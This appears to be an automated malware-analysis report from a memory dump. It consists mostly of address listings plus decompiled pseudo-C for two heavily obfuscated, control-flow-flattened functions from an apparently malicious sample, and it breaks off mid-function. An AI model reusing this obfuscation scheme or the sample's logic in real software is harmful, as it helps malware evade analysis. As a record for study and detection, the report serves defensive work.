                                                                                                                                                                                                                    0x00a6de1c
                                                                                                                                                                                                                    0x00a6de24
                                                                                                                                                                                                                    0x00a6de2c
                                                                                                                                                                                                                    0x00a6de34
                                                                                                                                                                                                                    0x00a6de3c
                                                                                                                                                                                                                    0x00a6de46
                                                                                                                                                                                                                    0x00a6de4a
                                                                                                                                                                                                                    0x00a6de52
                                                                                                                                                                                                                    0x00a6de5a
                                                                                                                                                                                                                    0x00a6de5f
                                                                                                                                                                                                                    0x00a6de64
                                                                                                                                                                                                                    0x00a6de6c
                                                                                                                                                                                                                    0x00a6de74
                                                                                                                                                                                                                    0x00a6de81
                                                                                                                                                                                                                    0x00a6de85
                                                                                                                                                                                                                    0x00a6de8d
                                                                                                                                                                                                                    0x00a6de95
                                                                                                                                                                                                                    0x00a6de9d
                                                                                                                                                                                                                    0x00a6dea5
                                                                                                                                                                                                                    0x00a6dead
                                                                                                                                                                                                                    0x00a6deb5
                                                                                                                                                                                                                    0x00a6deba
                                                                                                                                                                                                                    0x00a6deca
                                                                                                                                                                                                                    0x00a6dece
                                                                                                                                                                                                                    0x00a6ded6
                                                                                                                                                                                                                    0x00a6dede
                                                                                                                                                                                                                    0x00a6dee3
                                                                                                                                                                                                                    0x00a6deeb
                                                                                                                                                                                                                    0x00a6def3
                                                                                                                                                                                                                    0x00a6defb
                                                                                                                                                                                                                    0x00a6df03
                                                                                                                                                                                                                    0x00a6df0b
                                                                                                                                                                                                                    0x00a6df13
                                                                                                                                                                                                                    0x00a6df1b
                                                                                                                                                                                                                    0x00a6df23
                                                                                                                                                                                                                    0x00a6df2b
                                                                                                                                                                                                                    0x00a6df33
                                                                                                                                                                                                                    0x00a6df3b
                                                                                                                                                                                                                    0x00a6df40
                                                                                                                                                                                                                    0x00a6df44
                                                                                                                                                                                                                    0x00a6df4c
                                                                                                                                                                                                                    0x00a6df54
                                                                                                                                                                                                                    0x00a6df5c
                                                                                                                                                                                                                    0x00a6df64
                                                                                                                                                                                                                    0x00a6df71
                                                                                                                                                                                                                    0x00a6df72
                                                                                                                                                                                                                    0x00a6df76
                                                                                                                                                                                                                    0x00a6df7e
                                                                                                                                                                                                                    0x00a6df89
                                                                                                                                                                                                                    0x00a6df94
                                                                                                                                                                                                                    0x00a6df9f
                                                                                                                                                                                                                    0x00a6dfad
                                                                                                                                                                                                                    0x00a6dfb1
                                                                                                                                                                                                                    0x00a6dfc1
                                                                                                                                                                                                                    0x00a6dfc4
                                                                                                                                                                                                                    0x00a6dfc8
                                                                                                                                                                                                                    0x00a6dfd0
                                                                                                                                                                                                                    0x00a6dfd8
                                                                                                                                                                                                                    0x00a6dfe0
                                                                                                                                                                                                                    0x00a6dfe8
                                                                                                                                                                                                                    0x00a6dff0
                                                                                                                                                                                                                    0x00a6dff8
                                                                                                                                                                                                                    0x00a6e000
                                                                                                                                                                                                                    0x00a6e008
                                                                                                                                                                                                                    0x00a6e010
                                                                                                                                                                                                                    0x00a6e018
                                                                                                                                                                                                                    0x00a6e024
                                                                                                                                                                                                                    0x00a6e038
                                                                                                                                                                                                                    0x00a6e038
                                                                                                                                                                                                                    0x00a6e04a
                                                                                                                                                                                                                    0x00a6e16a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6e050
                                                                                                                                                                                                                    0x00a6e052
                                                                                                                                                                                                                    0x00a6e0f0
                                                                                                                                                                                                                    0x00a6e0f9
                                                                                                                                                                                                                    0x00a6e0fd
                                                                                                                                                                                                                    0x00a6e145
                                                                                                                                                                                                                    0x00a6e15b
                                                                                                                                                                                                                    0x00a6e160
                                                                                                                                                                                                                    0x00a6e163
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6e058
                                                                                                                                                                                                                    0x00a6e058
                                                                                                                                                                                                                    0x00a6e05a
                                                                                                                                                                                                                    0x00a6e060
                                                                                                                                                                                                                    0x00a6e069
                                                                                                                                                                                                                    0x00a6e06d
                                                                                                                                                                                                                    0x00a6e078
                                                                                                                                                                                                                    0x00a6e0c8
                                                                                                                                                                                                                    0x00a6e0de
                                                                                                                                                                                                                    0x00a6e0e3
                                                                                                                                                                                                                    0x00a6e0e6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6e0e6
                                                                                                                                                                                                                    0x00a6e05a
                                                                                                                                                                                                                    0x00a6e052
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6e04a
                                                                                                                                                                                                                    0x00a6e171
                                                                                                                                                                                                                    0x00a6e17c
                                                                                                                                                                                                                    0x00a6e187
                                                                                                                                                                                                                    0x00a6e18e
                                                                                                                                                                                                                    0x00a6e192
                                                                                                                                                                                                                    0x00a6e197
                                                                                                                                                                                                                    0x00a6e19a
                                                                                                                                                                                                                    0x00a6e19c
                                                                                                                                                                                                                    0x00a6e19c
                                                                                                                                                                                                                    0x00a6e19c
                                                                                                                                                                                                                    0x00a6e1ae

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: n{$q$%
                                                                                                                                                                                                                    • API String ID: 0-2921052786
                                                                                                                                                                                                                    • Opcode ID: b08baf031e050ac99d31f536925048c2d7ee3494287d0b7ed161fc13b55c8522
                                                                                                                                                                                                                    • Instruction ID: 4ffe6b48cb9709bf9132e7d660f6bd63e6b7117665d4747a3dd2e253deaa3059
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b08baf031e050ac99d31f536925048c2d7ee3494287d0b7ed161fc13b55c8522
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81E111B15083809FD368CF25C98A51BFBF2BBD5748F108A1CF2A996260D7B59949CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                    			E00A73158() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				signed int _v1044;
                                                                                                                                                                                                                    				signed int _v1048;
                                                                                                                                                                                                                    				signed int _v1052;
                                                                                                                                                                                                                    				signed int _v1056;
                                                                                                                                                                                                                    				signed int _v1060;
                                                                                                                                                                                                                    				signed int _v1064;
                                                                                                                                                                                                                    				signed int _v1068;
                                                                                                                                                                                                                    				signed int _v1072;
                                                                                                                                                                                                                    				signed int _v1076;
                                                                                                                                                                                                                    				signed int _v1080;
                                                                                                                                                                                                                    				signed int _v1084;
                                                                                                                                                                                                                    				signed int _v1088;
                                                                                                                                                                                                                    				signed int _v1092;
                                                                                                                                                                                                                    				signed int _v1096;
                                                                                                                                                                                                                    				signed int _v1100;
                                                                                                                                                                                                                    				signed int _v1104;
                                                                                                                                                                                                                    				signed int _v1108;
                                                                                                                                                                                                                    				signed int _v1112;
                                                                                                                                                                                                                    				signed int _v1116;
                                                                                                                                                                                                                    				signed int _v1120;
                                                                                                                                                                                                                    				signed int _v1124;
                                                                                                                                                                                                                    				void* _t240;
                                                                                                                                                                                                                    				void* _t272;
                                                                                                                                                                                                                    				signed int _t273;
                                                                                                                                                                                                                    				signed int _t274;
                                                                                                                                                                                                                    				signed int _t275;
                                                                                                                                                                                                                    				signed int _t276;
                                                                                                                                                                                                                    				signed int _t277;
                                                                                                                                                                                                                    				signed int _t278;
                                                                                                                                                                                                                    				signed int _t279;
                                                                                                                                                                                                                    				signed int _t280;
                                                                                                                                                                                                                    				signed int* _t283;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t283 =  &_v1124;
                                                                                                                                                                                                                    				_v1112 = 0xe2b108;
                                                                                                                                                                                                                    				_t240 = 0x3770a3b;
                                                                                                                                                                                                                    				_v1112 = _v1112 * 0x76;
                                                                                                                                                                                                                    				_t272 = 0;
                                                                                                                                                                                                                    				_v1112 = _v1112 >> 0xc;
                                                                                                                                                                                                                    				_t273 = 6;
                                                                                                                                                                                                                    				_v1112 = _v1112 * 0x65;
                                                                                                                                                                                                                    				_v1112 = _v1112 ^ 0x02957c79;
                                                                                                                                                                                                                    				_v1084 = 0xa15456;
                                                                                                                                                                                                                    				_v1084 = _v1084 * 0x69;
                                                                                                                                                                                                                    				_v1084 = _v1084 / _t273;
                                                                                                                                                                                                                    				_v1084 = _v1084 ^ 0x0b05e02f;
                                                                                                                                                                                                                    				_v1120 = 0x702f9f;
                                                                                                                                                                                                                    				_t274 = 0x68;
                                                                                                                                                                                                                    				_v1120 = _v1120 / _t274;
                                                                                                                                                                                                                    				_t275 = 0x61;
                                                                                                                                                                                                                    				_v1120 = _v1120 / _t275;
                                                                                                                                                                                                                    				_v1120 = _v1120 >> 6;
                                                                                                                                                                                                                    				_v1120 = _v1120 ^ 0x000329f5;
                                                                                                                                                                                                                    				_v1108 = 0xa25271;
                                                                                                                                                                                                                    				_v1108 = _v1108 | 0x984e17f5;
                                                                                                                                                                                                                    				_t276 = 0x77;
                                                                                                                                                                                                                    				_v1108 = _v1108 / _t276;
                                                                                                                                                                                                                    				_v1108 = _v1108 ^ 0x014a3d49;
                                                                                                                                                                                                                    				_v1088 = 0x6d5c1e;
                                                                                                                                                                                                                    				_v1088 = _v1088 >> 4;
                                                                                                                                                                                                                    				_v1088 = _v1088 >> 0xe;
                                                                                                                                                                                                                    				_v1088 = _v1088 ^ 0x0003f6a9;
                                                                                                                                                                                                                    				_v1068 = 0x48262d;
                                                                                                                                                                                                                    				_v1068 = _v1068 << 4;
                                                                                                                                                                                                                    				_v1068 = _v1068 + 0xffffc958;
                                                                                                                                                                                                                    				_v1068 = _v1068 ^ 0x0481d3fd;
                                                                                                                                                                                                                    				_v1056 = 0x3d7bfb;
                                                                                                                                                                                                                    				_t277 = 0x6f;
                                                                                                                                                                                                                    				_v1056 = _v1056 * 0x5b;
                                                                                                                                                                                                                    				_v1056 = _v1056 ^ 0x15d08ba7;
                                                                                                                                                                                                                    				_v1096 = 0xd7d9b7;
                                                                                                                                                                                                                    				_v1096 = _v1096 >> 0xf;
                                                                                                                                                                                                                    				_v1096 = _v1096 * 0x14;
                                                                                                                                                                                                                    				_v1096 = _v1096 ^ 0x0009dd39;
                                                                                                                                                                                                                    				_v1124 = 0x1ccf31;
                                                                                                                                                                                                                    				_v1124 = _v1124 + 0xffffe046;
                                                                                                                                                                                                                    				_v1124 = _v1124 >> 0xc;
                                                                                                                                                                                                                    				_v1124 = _v1124 | 0x992fa5b3;
                                                                                                                                                                                                                    				_v1124 = _v1124 ^ 0x9929fd2e;
                                                                                                                                                                                                                    				_v1072 = 0x17d2ab;
                                                                                                                                                                                                                    				_v1072 = _v1072 / _t277;
                                                                                                                                                                                                                    				_v1072 = _v1072 ^ 0x68920dfa;
                                                                                                                                                                                                                    				_v1072 = _v1072 ^ 0x6895f113;
                                                                                                                                                                                                                    				_v1048 = 0x11e208;
                                                                                                                                                                                                                    				_v1048 = _v1048 >> 0xa;
                                                                                                                                                                                                                    				_v1048 = _v1048 ^ 0x0006c751;
                                                                                                                                                                                                                    				_v1044 = 0x56dcbb;
                                                                                                                                                                                                                    				_v1044 = _v1044 << 3;
                                                                                                                                                                                                                    				_v1044 = _v1044 ^ 0x02b6a62f;
                                                                                                                                                                                                                    				_v1080 = 0xbfb76d;
                                                                                                                                                                                                                    				_t278 = 0x34;
                                                                                                                                                                                                                    				_v1080 = _v1080 / _t278;
                                                                                                                                                                                                                    				_t279 = 0xa;
                                                                                                                                                                                                                    				_v1080 = _v1080 * 0x15;
                                                                                                                                                                                                                    				_v1080 = _v1080 ^ 0x00401c54;
                                                                                                                                                                                                                    				_v1052 = 0xfd87e;
                                                                                                                                                                                                                    				_v1052 = _v1052 >> 6;
                                                                                                                                                                                                                    				_v1052 = _v1052 ^ 0x0003cdfb;
                                                                                                                                                                                                                    				_v1060 = 0x24cabe;
                                                                                                                                                                                                                    				_v1060 = _v1060 * 0x3b;
                                                                                                                                                                                                                    				_v1060 = _v1060 ^ 0x08779a33;
                                                                                                                                                                                                                    				_v1076 = 0x94eaf7;
                                                                                                                                                                                                                    				_v1076 = _v1076 >> 1;
                                                                                                                                                                                                                    				_v1076 = _v1076 * 0x3a;
                                                                                                                                                                                                                    				_v1076 = _v1076 ^ 0x10dc7e1a;
                                                                                                                                                                                                                    				_v1092 = 0x40d604;
                                                                                                                                                                                                                    				_v1092 = _v1092 + 0xd12d;
                                                                                                                                                                                                                    				_v1092 = _v1092 + 0xffffec15;
                                                                                                                                                                                                                    				_v1092 = _v1092 ^ 0x004f0bb3;
                                                                                                                                                                                                                    				_v1064 = 0x4ac7da;
                                                                                                                                                                                                                    				_v1064 = _v1064 ^ 0xb2bf4505;
                                                                                                                                                                                                                    				_v1064 = _v1064 ^ 0xb2f697f1;
                                                                                                                                                                                                                    				_v1116 = 0x711cf;
                                                                                                                                                                                                                    				_v1116 = _v1116 / _t279;
                                                                                                                                                                                                                    				_v1116 = _v1116 + 0xa9e8;
                                                                                                                                                                                                                    				_v1116 = _v1116 + 0xffff4d14;
                                                                                                                                                                                                                    				_v1116 = _v1116 ^ 0x000fd4b6;
                                                                                                                                                                                                                    				_v1100 = 0x8c331e;
                                                                                                                                                                                                                    				_t280 = 0x25;
                                                                                                                                                                                                                    				_v1100 = _v1100 / _t280;
                                                                                                                                                                                                                    				_v1100 = _v1100 >> 3;
                                                                                                                                                                                                                    				_v1100 = _v1100 ^ 0x00048827;
                                                                                                                                                                                                                    				_v1104 = 0x75e57e;
                                                                                                                                                                                                                    				_v1104 = _v1104 + 0x60e3;
                                                                                                                                                                                                                    				_v1104 = _v1104 | 0x158d3e7f;
                                                                                                                                                                                                                    				_v1104 = _v1104 ^ 0x15f2b57a;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t240 != 0x18b589d) {
                                                                                                                                                                                                                    						if(_t240 == 0x1e9931e) {
                                                                                                                                                                                                                    							E00A65D88(_v1100,  &_v1040, _v1104);
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t240 == 0x3770a3b) {
                                                                                                                                                                                                                    								_t240 = 0x18b589d;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t240 == 0x577422c) {
                                                                                                                                                                                                                    									_push(_v1096);
                                                                                                                                                                                                                    									_push(_v1056);
                                                                                                                                                                                                                    									_push(_v1068);
                                                                                                                                                                                                                    									E00A7E773(_v1072, __eflags,  *0xa83b38 + 0xc, _v1048, 0xa610fc,  &_v1040, E00A81E60(0xa610fc, _v1088, __eflags),  *0xa83b38 + 0x21c, _v1044);
                                                                                                                                                                                                                    									E00A7D6DF(_v1080, _t230, _v1052, _v1060);
                                                                                                                                                                                                                    									_t283 =  &(_t283[0xc]);
                                                                                                                                                                                                                    									_t240 = 0xffd65f5;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t290 = _t240 - 0xffd65f5;
                                                                                                                                                                                                                    									if(_t240 != 0xffd65f5) {
                                                                                                                                                                                                                    										goto L10;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_push(_v1116);
                                                                                                                                                                                                                    										_push(_v1064);
                                                                                                                                                                                                                    										_push(_v1092);
                                                                                                                                                                                                                    										_push(_v1076);
                                                                                                                                                                                                                    										E00A77900( &_v520,  &_v1040, _t290);
                                                                                                                                                                                                                    										_t283 =  &(_t283[4]);
                                                                                                                                                                                                                    										_t272 =  !=  ? 1 : _t272;
                                                                                                                                                                                                                    										_t240 = 0x1e9931e;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                    						return _t272;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A6D804(_v1112, _v1084,  &_v520, _t240, _v1120, _v1108);
                                                                                                                                                                                                                    					_t283 =  &(_t283[4]);
                                                                                                                                                                                                                    					_t240 = 0x577422c;
                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                    					__eflags = _t240 - 0xaef3ea1;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                    			}





































                                                                                                                                                                                                                    0x00a73158
                                                                                                                                                                                                                    0x00a7315e
                                                                                                                                                                                                                    0x00a7316d
                                                                                                                                                                                                                    0x00a73176
                                                                                                                                                                                                                    0x00a7317a
                                                                                                                                                                                                                    0x00a7317c
                                                                                                                                                                                                                    0x00a73188
                                                                                                                                                                                                                    0x00a7318b
                                                                                                                                                                                                                    0x00a7318f
                                                                                                                                                                                                                    0x00a73197
                                                                                                                                                                                                                    0x00a731a4
                                                                                                                                                                                                                    0x00a731b0
                                                                                                                                                                                                                    0x00a731b4
                                                                                                                                                                                                                    0x00a731bc
                                                                                                                                                                                                                    0x00a731c8
                                                                                                                                                                                                                    0x00a731cd
                                                                                                                                                                                                                    0x00a731d7
                                                                                                                                                                                                                    0x00a731dc
                                                                                                                                                                                                                    0x00a731e2
                                                                                                                                                                                                                    0x00a731e7
                                                                                                                                                                                                                    0x00a731ef
                                                                                                                                                                                                                    0x00a731f7
                                                                                                                                                                                                                    0x00a73203
                                                                                                                                                                                                                    0x00a73208
                                                                                                                                                                                                                    0x00a7320e
                                                                                                                                                                                                                    0x00a73216
                                                                                                                                                                                                                    0x00a7321e
                                                                                                                                                                                                                    0x00a73223
                                                                                                                                                                                                                    0x00a73228
                                                                                                                                                                                                                    0x00a73230
                                                                                                                                                                                                                    0x00a73238
                                                                                                                                                                                                                    0x00a7323d
                                                                                                                                                                                                                    0x00a73245
                                                                                                                                                                                                                    0x00a7324d
                                                                                                                                                                                                                    0x00a7325a
                                                                                                                                                                                                                    0x00a7325b
                                                                                                                                                                                                                    0x00a7325f
                                                                                                                                                                                                                    0x00a73267
                                                                                                                                                                                                                    0x00a7326f
                                                                                                                                                                                                                    0x00a73279
                                                                                                                                                                                                                    0x00a7327d
                                                                                                                                                                                                                    0x00a73285
                                                                                                                                                                                                                    0x00a7328d
                                                                                                                                                                                                                    0x00a73295
                                                                                                                                                                                                                    0x00a7329a
                                                                                                                                                                                                                    0x00a732a2
                                                                                                                                                                                                                    0x00a732aa
                                                                                                                                                                                                                    0x00a732b8
                                                                                                                                                                                                                    0x00a732bc
                                                                                                                                                                                                                    0x00a732c4
                                                                                                                                                                                                                    0x00a732cc
                                                                                                                                                                                                                    0x00a732d4
                                                                                                                                                                                                                    0x00a732d9
                                                                                                                                                                                                                    0x00a732e1
                                                                                                                                                                                                                    0x00a732eb
                                                                                                                                                                                                                    0x00a732f5
                                                                                                                                                                                                                    0x00a73302
                                                                                                                                                                                                                    0x00a73310
                                                                                                                                                                                                                    0x00a73315
                                                                                                                                                                                                                    0x00a73320
                                                                                                                                                                                                                    0x00a73323
                                                                                                                                                                                                                    0x00a73327
                                                                                                                                                                                                                    0x00a7332f
                                                                                                                                                                                                                    0x00a73337
                                                                                                                                                                                                                    0x00a7333c
                                                                                                                                                                                                                    0x00a73344
                                                                                                                                                                                                                    0x00a73351
                                                                                                                                                                                                                    0x00a73355
                                                                                                                                                                                                                    0x00a7335d
                                                                                                                                                                                                                    0x00a73365
                                                                                                                                                                                                                    0x00a7336e
                                                                                                                                                                                                                    0x00a73372
                                                                                                                                                                                                                    0x00a7337a
                                                                                                                                                                                                                    0x00a73382
                                                                                                                                                                                                                    0x00a7338a
                                                                                                                                                                                                                    0x00a73392
                                                                                                                                                                                                                    0x00a7339a
                                                                                                                                                                                                                    0x00a733a2
                                                                                                                                                                                                                    0x00a733aa
                                                                                                                                                                                                                    0x00a733b2
                                                                                                                                                                                                                    0x00a733c2
                                                                                                                                                                                                                    0x00a733c6
                                                                                                                                                                                                                    0x00a733ce
                                                                                                                                                                                                                    0x00a733d6
                                                                                                                                                                                                                    0x00a733de
                                                                                                                                                                                                                    0x00a733ea
                                                                                                                                                                                                                    0x00a733ed
                                                                                                                                                                                                                    0x00a733f1
                                                                                                                                                                                                                    0x00a733f6
                                                                                                                                                                                                                    0x00a733fe
                                                                                                                                                                                                                    0x00a73406
                                                                                                                                                                                                                    0x00a7340e
                                                                                                                                                                                                                    0x00a73416
                                                                                                                                                                                                                    0x00a7341e
                                                                                                                                                                                                                    0x00a7341e
                                                                                                                                                                                                                    0x00a7342c
                                                                                                                                                                                                                    0x00a73533
                                                                                                                                                                                                                    0x00a73432
                                                                                                                                                                                                                    0x00a73438
                                                                                                                                                                                                                    0x00a734ef
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7343e
                                                                                                                                                                                                                    0x00a73440
                                                                                                                                                                                                                    0x00a73480
                                                                                                                                                                                                                    0x00a73489
                                                                                                                                                                                                                    0x00a7348d
                                                                                                                                                                                                                    0x00a734ca
                                                                                                                                                                                                                    0x00a734dd
                                                                                                                                                                                                                    0x00a734e2
                                                                                                                                                                                                                    0x00a734e5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a73442
                                                                                                                                                                                                                    0x00a73442
                                                                                                                                                                                                                    0x00a73448
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7344e
                                                                                                                                                                                                                    0x00a7344e
                                                                                                                                                                                                                    0x00a73456
                                                                                                                                                                                                                    0x00a73461
                                                                                                                                                                                                                    0x00a73465
                                                                                                                                                                                                                    0x00a73469
                                                                                                                                                                                                                    0x00a73470
                                                                                                                                                                                                                    0x00a73476
                                                                                                                                                                                                                    0x00a73479
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a73479
                                                                                                                                                                                                                    0x00a73448
                                                                                                                                                                                                                    0x00a73440
                                                                                                                                                                                                                    0x00a73438
                                                                                                                                                                                                                    0x00a73539
                                                                                                                                                                                                                    0x00a73545
                                                                                                                                                                                                                    0x00a73545
                                                                                                                                                                                                                    0x00a7350f
                                                                                                                                                                                                                    0x00a73514
                                                                                                                                                                                                                    0x00a73517
                                                                                                                                                                                                                    0x00a73519
                                                                                                                                                                                                                    0x00a73519
                                                                                                                                                                                                                    0x00a73519
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -&H$~u$`
                                                                                                                                                                                                                    • API String ID: 0-3364259093
                                                                                                                                                                                                                    • Opcode ID: 6f81df7be13ab3973438f847ae72aea9bb7708d013f85ce5d15579623f9bf385
                                                                                                                                                                                                                    • Instruction ID: a2b4157c31510011ee930c55889a2cff328fdff9afa83018986d16e0fc83d26f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f81df7be13ab3973438f847ae72aea9bb7708d013f85ce5d15579623f9bf385
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92A1F0725083419FC718CF66D98A55BBBF2FBC4758F00891DF29A86260D7B5CA49CF82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A7CFA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                    				intOrPtr _v96;
                                                                                                                                                                                                                    				char _v104;
                                                                                                                                                                                                                    				intOrPtr _v108;
                                                                                                                                                                                                                    				char _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				unsigned int _v160;
                                                                                                                                                                                                                    				void* _t123;
                                                                                                                                                                                                                    				signed int _t142;
                                                                                                                                                                                                                    				signed int _t145;
                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                    				void* _t154;
                                                                                                                                                                                                                    				intOrPtr _t162;
                                                                                                                                                                                                                    				signed int _t181;
                                                                                                                                                                                                                    				signed int _t182;
                                                                                                                                                                                                                    				signed int _t183;
                                                                                                                                                                                                                    				void* _t185;
                                                                                                                                                                                                                    				void* _t186;
                                                                                                                                                                                                                    				void* _t188;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t152 = __ecx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t123);
                                                                                                                                                                                                                    				_v44 = 0x881e66;
                                                                                                                                                                                                                    				_t181 = 0;
                                                                                                                                                                                                                    				_v40 = 0x7c9812;
                                                                                                                                                                                                                    				_t186 = _t185 + 0x10;
                                                                                                                                                                                                                    				_v36 = 0xf6f812;
                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                    				_t154 = 0xd9c5947;
                                                                                                                                                                                                                    				_v120 = 0xdf092a;
                                                                                                                                                                                                                    				_v120 = _v120 | 0x1b4b883f;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x1bd94732;
                                                                                                                                                                                                                    				_v124 = 0xe7af8a;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0xa3c5abc5;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0xa329330a;
                                                                                                                                                                                                                    				_v128 = 0xef5a87;
                                                                                                                                                                                                                    				_v128 = _v128 >> 0xf;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x0006fb7a;
                                                                                                                                                                                                                    				_v152 = 0x506a02;
                                                                                                                                                                                                                    				_v152 = _v152 + 0xcdd2;
                                                                                                                                                                                                                    				_v152 = _v152 + 0x2b7b;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x0050ecbd;
                                                                                                                                                                                                                    				_v156 = 0xf7643d;
                                                                                                                                                                                                                    				_t182 = 0x73;
                                                                                                                                                                                                                    				_v156 = _v156 / _t182;
                                                                                                                                                                                                                    				_v156 = _v156 >> 0xb;
                                                                                                                                                                                                                    				_v156 = _v156 >> 0xd;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x0006ea83;
                                                                                                                                                                                                                    				_v148 = 0x3e0bbf;
                                                                                                                                                                                                                    				_v148 = _v148 << 5;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x07cb314a;
                                                                                                                                                                                                                    				_v144 = 0xa349d4;
                                                                                                                                                                                                                    				_v144 = _v144 + 0xcf70;
                                                                                                                                                                                                                    				_v144 = _v144 >> 6;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x000077e4;
                                                                                                                                                                                                                    				_v132 = 0x444bd9;
                                                                                                                                                                                                                    				_v132 = _v132 >> 1;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x0020c24e;
                                                                                                                                                                                                                    				_v136 = 0xb0bb67;
                                                                                                                                                                                                                    				_v136 = _v136 >> 4;
                                                                                                                                                                                                                    				_t183 = _v132;
                                                                                                                                                                                                                    				_v136 = _v136 * 0xf;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x00a3432a;
                                                                                                                                                                                                                    				_v160 = 0xc74825;
                                                                                                                                                                                                                    				_v160 = _v160 + 0xffffa5f6;
                                                                                                                                                                                                                    				_v160 = _v160 * 0x6e;
                                                                                                                                                                                                                    				_v160 = _v160 >> 0xa;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x001fcc70;
                                                                                                                                                                                                                    				_v140 = 0x36f8c2;
                                                                                                                                                                                                                    				_v140 = _v140 + 0x3f6;
                                                                                                                                                                                                                    				_v140 = _v140 + 0xffff3849;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x00363581;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					_t188 = _t154 - 0x46c5bd1;
                                                                                                                                                                                                                    					if(_t188 > 0) {
                                                                                                                                                                                                                    						goto L28;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                    					if(_t188 == 0) {
                                                                                                                                                                                                                    						_t183 = E00A7C6D9(0x3c);
                                                                                                                                                                                                                    						__eflags = _t183;
                                                                                                                                                                                                                    						if(_t183 == 0) {
                                                                                                                                                                                                                    							L39:
                                                                                                                                                                                                                    							_t154 = 0xa4f8cf4;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									_t188 = _t154 - 0x46c5bd1;
                                                                                                                                                                                                                    									if(_t188 > 0) {
                                                                                                                                                                                                                    										goto L28;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
